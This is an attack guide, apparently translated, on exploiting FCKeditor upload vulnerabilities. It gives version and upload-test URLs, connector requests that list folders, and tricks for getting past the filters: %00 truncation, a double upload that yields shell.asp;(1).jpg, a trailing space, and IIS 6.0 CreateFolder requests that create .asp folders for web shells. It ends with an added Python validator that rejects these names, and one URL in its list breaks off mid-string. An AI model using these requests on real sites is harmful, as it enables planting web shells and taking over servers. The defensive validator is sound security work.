
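I. About FCKeditor
FCKeditor is a web-based text editor that is used in many content management systems.
This article briefly introduces the approach for attacking through FCKeditor upload vulnerabilities and collects the operations that may be used along the way.
II. Attack approach
1. Check the FCKeditor version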
http://127.0.0.1/fckeditor/editor/dialog/fck_about.html
http://127.0.0.1/FCKeditor/_whatsnew.html
2. Test the upload points
FCKeditor/editor/filemanager/browser/default/connectors/test.html
FCKeditor/editor/filemanager/upload/test.html
FCKeditor/editor/filemanager/connectors/test.html
FCKeditor/editor/filemanager/connectors/uploadtest.html
FCKeditor/_samples/default.html
FCKeditor/_samples/asp/sample01.asp
FCKeditor/_samples/asp/sample02.asp
FCKeditor/_samples/asp/sample03.asp
FCKeditor/_samples/asp/sample04.asp
FCKeditor/editor/fckeditor.htm
FCKeditor/editor/fckdialog.html
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/php/connector.php
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/aspx/connector.aspx
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com/fckeditor/editor/filemanager/connectors/jsp/connector.jsp
FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp
fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/aspx/connector.Aspx
fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Con
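3. Bypassing restrictions
3.1 Upload restrictions
There are many ways to bypass upload restrictions; the main ones are intercepting the request and changing the extension, %00 truncation, adding a file header, and so on.
3.2 File name restrictions
3.2.1 Uploading a second time to bypass the renaming of '.' to '_' in the file name
After a file such as shell.asp;.jpg is uploaded, FCK automatically renames it to shell_asp;.jpg. A file with the same name can then be uploaded again, and its name becomes shell.asp;(1).jpg.
3.2.2 Submitting shell.php+space to bypass
The trailing space only works on Windows systems; Linux systems do not support it. Submitting shell.php followed by a space can bypass the file name restriction.
3.3 Bypassing the folder restriction on IIS 6.0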
Fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=File&CurrentFolder=/shell.asp&NewFolderName=z.asp
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/shell.asp&NewFolderName=z&uuid=1244789975684
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp
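A defensive counterpart to sections 3.2 and 3.3, as an added example that is not part of the original article and is not FCKeditor's own code: a Python check an upload handler could apply so that the file and folder names shown above are rejected instead of rewritten. The extension allowlist, the length limits and all function names are assumptions.

```python
import re
import uuid

ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}          # assumed allowlist for Type=Image
SAFE_STEM = re.compile(r"^[A-Za-z0-9_-]{1,64}$")     # no '.', ';', '(' or spaces
SAFE_FOLDER = re.compile(r"^[A-Za-z0-9_-]{1,32}$")   # no dots, so no folder like z.asp


def safe_upload_name(client_name: str) -> str:
    """Return a server-generated stored name, or raise ValueError."""
    if "\x00" in client_name:
        raise ValueError("null byte in file name")
    # Keep only the last path component; split on both separators (Windows targets).
    name = re.split(r"[\\/]", client_name)[-1]
    # Windows drops trailing spaces and dots, so "shell.php " is stored as "shell.php".
    if name != name.rstrip(" ."):
        raise ValueError("trailing space or dot")
    stem, dot, ext = name.rpartition(".")
    if not dot or ext.lower() not in ALLOWED_EXT:
        raise ValueError("extension not allowed")
    # Reject instead of rewriting: shell.asp;.jpg, shell_asp;.jpg and
    # shell.asp;(1).jpg all fail here because of '.', ';' or '(' in the stem.
    if not SAFE_STEM.match(stem):
        raise ValueError("unsafe characters in file name")
    # The stored name never reuses client input, including on a name collision.
    return f"{uuid.uuid4().hex}.{ext.lower()}"


def safe_folder_path(current_folder: str, new_folder: str) -> str:
    """Validate every segment of CurrentFolder plus NewFolderName."""
    segments = [s for s in current_folder.split("/") if s] + [new_folder]
    for seg in segments:
        if not SAFE_FOLDER.match(seg):
            raise ValueError(f"unsafe folder segment: {seg!r}")
    return "/" + "/".join(segments)


def is_rejected(fn, *args) -> bool:
    """True when the validator refuses the input."""
    try:
        fn(*args)
    except ValueError:
        return True
    return False
```

Validating CurrentFolder as well as NewFolderName matters because two of the requests in section 3.3 place the .asp name in CurrentFolder rather than in the new folder name.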
